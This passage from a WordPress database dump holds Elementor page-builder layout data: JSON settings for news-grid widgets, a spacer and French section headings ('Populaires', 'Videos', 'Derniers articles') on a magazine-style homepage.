y\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Derniers articles\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1381,482,'_elementor_version','0.4'),(1382,483,'_elementor_edit_mode','builder'),(1383,483,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos 